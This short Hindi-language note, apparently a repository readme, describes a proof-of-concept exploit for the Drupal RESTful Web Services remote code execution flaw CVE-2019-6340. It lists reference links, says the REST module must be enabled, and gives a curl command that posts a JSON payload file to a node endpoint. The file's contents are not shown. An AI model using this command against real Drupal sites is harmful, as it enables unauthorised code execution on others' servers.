
CVE-2019-6340 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Drupal के RESTful वेब सेवा मॉड्यूल को लक्षित करता है, जिसमें curl-आधारित RCE पेलोड और विस्तृत पुनरुत्पादन चरण शामिल हैं।
Drupal SA-CORE-2019-003 CVE-2019-6340
CVE-2019-6340.md https://mp.weixin.qq.com/s/EQD4-K6HgBY9wdzeXeyzkg
https://www.youtube.com/watch?v=QtLDDN0Duko
https://pbs.twimg.com/media/D0C-KiXX4AM2vR3.jpg:large
CVE-2019-6340 डिफ़ॉल्ट कॉन्फ़िगरेशन नहीं है; आपको मैन्युअल रूप से RESTful वेब सेवाओं को सक्षम करना होगा:

कमांड $ curl -k -v -H 'Content-Type: application/json' -d @./drupalrce.json 'https://<http://your.web.site >/node/<node_id>?_format=hal_json'
फ़ाइल drupalrce.json
